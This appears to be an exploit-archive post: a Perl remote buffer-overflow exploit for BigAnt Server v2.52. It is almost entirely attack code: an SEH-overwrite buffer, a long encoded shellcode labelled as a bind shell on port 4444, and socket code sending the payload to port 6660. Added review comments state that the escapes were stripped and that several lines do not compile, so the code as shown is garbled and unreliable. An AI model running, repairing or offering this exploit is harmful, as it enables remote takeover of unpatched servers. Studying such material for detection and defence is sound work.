ba252-overflow.txt
Posted on 15 January 2010
# Exploit Title: BigAnt Server v2.52 Remote BOF (Perl)
# Date: 2009-1-14
# Author: Jacky
# Software Link: [downoad link if available]
# Version: 2.52
# Tested on: Windows XP SP2
# CVE : [if exists]
# Code :
#BigAnt Server v2.52 Remote BOF (Perl Edition )
#Discovered by Lincoln !!!
# Written and coded by Jacky!
# All Greetz to Peter Van Eeckhoutte and Corelan team!
# This time i wrote this exploit in perl because i haven't seen anyone wrote it in perl and share it .
#THIS EXPLOIT IS FOR EDUCATIONAL PURPOSES ONLY !!!
#
# NOTE(review): the listing as posted has been mangled in transit -- whitespace
# is collapsed and the backslashes of the "\x.." escapes are gone, so every
# string below is literal ASCII text ("x50x50...") rather than the byte values
# the author intended. It is documented here as-is and not repaired; several
# statements also do not compile under `use strict` as written (see notes).

use strict;
use Socket;

# Exactly one positional argument is expected: the target host.
# `ne` compares the element count of @ARGV with "1" as strings.
if(@ARGV ne 1) {
    print "Usage:$0 <ip address> ";
    exit 0;
}
# NOTE(review): $host is never declared with `my`; under `use strict` this
# assignment is rejected at compile time.
($host)=@ARGV;

# Payload layout, front to back (sizes as written in the code):
#   294 bytes of filler, a 4-byte next-SEH slot, a 4-byte SEH handler slot,
#   20 filler bytes, the encoded payload, then 1000 more filler bytes.
my $buffer="A"x294;             # 294 bytes of 'A' before the SEH record
my $nseh="xebx06x90x90";         # 4-byte next-SEH field (escapes stripped, see top note)
my $seh="x95x32x9ax0f";          # 4-byte SEH handler field; build-specific per the header
my $nops="x90"x20;               # 20-byte pad before the payload

# Encoded payload. The author's trailing comment says it opens a listener on
# TCP 4444 -- the post-exploitation artifact a defender would look for.
my $shellcode="x50x50x59x41x49x41x49x41x49x41x49x41x51x41x54".
"x41x58x41x5ax41x50x55x33x51x41x44x41x5ax41x42".
"x41x52x41x4cx41x59x41x49x41x51x41x49x41x51x41".
"x50x41x35x41x41x41x50x41x5ax31x41x49x31x41x49".
"x41x49x41x4ax31x31x41x49x41x49x41x58x41x35x38".
"x41x41x50x41x5ax41x42x41x42x51x49x31x41x49x51".
"x49x41x49x51x49x31x31x31x31x41x49x41x4ax51x49".
"x31x41x59x41x5ax42x41x42x41x42x41x42x41x42x33".
"x30x41x50x42x39x34x34x4ax42x45x39x49x51x49x4a".
"x49x49x48x59x44x31x4ax54x51x4dx42x35x42x39x50".
"x49x50x49x51x39x51x39x50x49x51x39x50x49x51x39".
"x51x39x51x39x51x33x50x43x50x43x50x43x50x43x50".
"x43x50x37x42x31x50x5ax42x4ax51x31x50x58x50x50".
"x50x30x51x31x50x30x51x31x42x4bx51x31x51x31x42".
"x31x50x32x51x31x51x32x50x32x51x32x51x32x50x30".
"x50x42x51x32x51x31x51x32x50x58x42x30x50x38x51".
"x31x51x32x42x55x50x4ax51x39x50x49x42x4cx50x4d".
"x50x38x50x4fx44x39x50x43x50x30x50x47x42x50x50".
"x45x50x50x51x35x50x30x50x4bx50x39x50x4ax50x45".
"x50x45x43x31x50x4ex50x32x50x43x42x34x50x4cx50".
"x4bx50x50x51x42x50x46x50x50x50x4ex42x4bx42x31".
"x50x42x50x44x50x4cx50x4cx50x4bx51x36x50x32x51".
"x37x43x34x50x4ex42x4bx50x51x43x32x50x47x42x38".
"x50x44x50x4fx50x4cx42x57x51x32x51x5ax51x35x43".
"x46x51x36x50x51x50x49x42x4fx50x46x42x31x50x4b".
"x42x50x50x4cx42x4cx50x45x42x4cx50x50x43x31x50".
"x51x42x4cx51x35x42x32x50x46x50x4cx51x35x42x50".
"x50x4ax43x31x50x4ax42x4fx51x34x50x4dx51x37x42".
"x51x50x4bx42x57x51x39x44x32x50x4cx50x30x50x46".
"x50x32x50x43x43x37x50x4ex42x4bx50x43x42x42x51".
"x34x50x50x50x4cx50x4bx50x50x50x42x50x47x50x4c".
"x50x46x51x51x50x4ex50x30x50x4ex42x4bx50x47x50".
"x30x50x42x51x48x50x4fx42x55x50x4bx42x50x51x34".
"x50x34x50x43x43x4ax51x37x44x31x50x48x50x50x51".
"x32x44x30x50x4cx50x4bx50x42x42x48x50x42x50x38".
"x50x4cx50x4bx42x31x51x38x51x37x42x30x51x37x42".
"x51x50x4ex50x33x50x4dx50x33x50x45x42x4cx51x32".
"x43x39x50x4ex42x4bx51x35x43x34x50x4cx50x4bx51".
"x37x42x51x50x49x51x36x42x30x50x31x51x39x42x4f".
"x50x44x42x51x50x4fx50x30x50x4cx42x4cx50x4bx42".
"x51x50x4ax42x4fx51x36x42x4dx50x43x50x31x50x4a".
"x42x47x51x35x43x38x50x4bx42x30x50x51x42x45x50".
"x48x43x44x51x33x50x33x50x43x50x4dx50x4ax42x38".
"x51x35x42x4bx50x43x50x4dx50x45x44x34x50x43x51".
"x35x50x48x51x52x51x32x42x58x50x4cx50x4bx50x42".
"x44x38x50x47x51x44x51x37x44x31x50x4bx43x33x50".
"x50x43x36x50x4ex42x4bx50x44x50x4cx50x42x42x4b".
"x50x4cx50x4bx51x33x42x48x51x35x50x4cx50x45x42".
"x31x51x38x50x53x50x4ex42x4bx51x36x51x54x50x4e".
"x42x4bx51x37x44x31x51x38x42x30x50x4dx42x39x50".
"x51x42x34x50x45x42x54x51x34x42x44x51x33x42x4b".
"x50x43x42x4bx51x35x50x31x51x32x44x39x51x33x51".
"x5ax50x50x50x51x50x4bx50x4fx50x4bx50x50x50x42".
"x43x48x51x33x42x4fx42x31x50x4ax50x4ex42x4bx50".
"x46x42x52x50x4ax50x4bx50x4fx42x56x50x51x50x4d".
"x51x35x50x38x50x50x50x33x51x36x51x42x50x43x50".
"x30x50x47x42x50x51x35x50x38x51x34x50x37x42x30".
"x43x43x50x44x42x52x51x33x42x4fx50x42x43x44x50".
"x51x42x58x42x30x50x4cx50x42x42x37x51x35x44x36".
"x50x47x42x57x50x4bx50x4fx50x4ex50x35x50x4fx50".
"x48x50x4cx50x50x50x45x50x51x50x47x44x30x50x45".
"x42x30x50x46x51x39x50x4fx50x34x50x46x50x34x51".
"x32x44x30x51x35x50x38x42x31x50x39x50x4bx50x30".
"x42x30x42x4bx51x33x50x30x50x4bx50x4fx50x49x51".
"x35x50x50x42x30x50x46x50x30x42x30x42x30x51x36".
"x50x30x50x51x42x30x51x36x50x30x42x31x42x30x50".
"x42x42x50x51x35x50x38x51x38x42x4ax50x46x42x4f".
"x50x49x50x4fx51x39x42x50x50x4bx50x4fx50x48x42".
"x35x50x4dx42x39x50x4bx44x37x51x36x42x31x50x4b".
"x42x4bx51x32x42x53x50x50x51x58x50x45x51x42x51".
"x35x42x30x51x36x42x51x50x43x42x4cx50x4fx42x59".
"x50x4ax51x36x50x50x51x5ax51x36x42x50x51x36x50".
"x36x51x32x43x47x50x51x42x58x51x39x50x52x51x39".
"x50x4bx51x37x51x37x50x50x42x47x51x39x42x4fx50".
"x4ex50x35x50x46x50x33x50x42x44x37x42x31x42x58".
"x50x4ex42x37x50x48x51x59x51x36x51x48x50x4bx50".
"x4fx50x4bx50x4fx50x48x50x55x50x43x51x53x51x33".
"x42x43x51x33x51x57x50x50x42x48x42x30x42x54x51".
"x38x42x4cx51x35x42x4bx50x4dx50x31x50x49x42x4f".
"x50x4bx42x45x51x33x43x37x50x4fx43x49x50x49x51".
"x47x50x42x50x48x42x31x51x55x51x32x50x4ex51x32".
"x42x4dx51x33x42x31x50x4bx50x4fx50x48x51x45x50".
"x42x51x38x50x43x42x33x51x32x50x4dx42x30x43x34".
"x51x37x42x50x50x4dx51x49x51x38x51x53x50x51x50".
"x47x42x31x51x37x51x36x50x37x50x44x44x31x50x4c".
"x50x36x50x51x42x5ax50x42x50x32x42x31x51x39x50".
"x46x50x36x50x4dx50x32x51x39x42x4dx42x30x51x56".
"x50x4ax42x47x50x47x50x34x50x45x44x34x51x35x42".
"x4cx50x46x43x31x50x46x51x51x50x4ex42x4dx50x50".
"x51x34x42x31x50x34x50x42x50x30x50x48x50x46x50".
"x47x42x50x50x47x50x34x50x51x51x34x50x50x50x50".
"x50x50x51x46x50x43x43x36x51x36x50x36x42x30x50".
"x46x51x33x51x56x42x30x50x4ex50x46x50x36x51x33".
"x51x56x50x42x44x33x50x50x50x56x51x32x50x48x50".
"x51x51x59x50x4ax42x4cx50x47x50x4fx50x4cx50x46".
"x50x4bx50x4fx51x38x51x45x50x4ex42x49x50x4dx50".
"x30x42x30x50x4ex50x50x50x56x50x43x43x46x50x4b".
"x50x4fx50x50x50x30x50x45x50x38x50x46x51x58x50".
"x4ex51x57x51x35x50x4dx51x35x50x30x50x4bx50x4f".
"x50x4bx43x35x50x4dx42x4bx50x4ax42x30x50x4fx50".
"x45x50x4cx43x32x42x31x50x46x50x42x50x48x50x4d".
"x43x46x50x4dx50x45x50x4fx50x4dx50x4fx42x4dx50".
"x4bx50x4fx51x38x50x55x50x47x50x4cx51x33x50x36".
"x50x51x42x4cx51x36x51x5ax50x4dx50x50x50x4bx50".
"x4bx50x4dx50x30x50x44x50x35x50x46x43x35x50x4f".
"x50x4bx50x42x42x47x50x46x43x43x42x30x43x42x50".
"x42x50x4fx50x43x50x5ax51x37x44x30x50x42x42x53".
"x50x49x42x4fx50x4bx51x55x50x45x51x4ax51x31x51".
"x31x41x41"; #Bind port 4444

my $rest="A"x1000;              # 1000 trailing filler bytes
my $payload=$buffer.$nseh.$seh.$nops.$shellcode.$rest;

# Default service port is 6660.
# NOTE(review): `Shift` is capitalised, so it is a bareword here, not the
# `shift` builtin; under `use strict` this line does not compile.
my $port=Shift || 6660;
my $proto=getprotobyname('tcp');
socket(SERVER,PF_INET,SOCK_STREAM,$proto);
# NOTE(review): as posted this connect() is not given the SERVER handle
# created above, so the call cannot succeed as written.
connect($host,$port) or die "[+]Cannot Connect! ";
print "[+]Connection Done! ";
# On the wire: the literal prefix "USV" followed immediately by the payload,
# i.e. a run of 294 'A' bytes right after "USV" -- a concrete shape a
# network detection for this service can key on.
print SERVER "USV".$payload." ";
print "[+]Evil Payload Sent! ";
print "[+]Done! ";
close SERVER;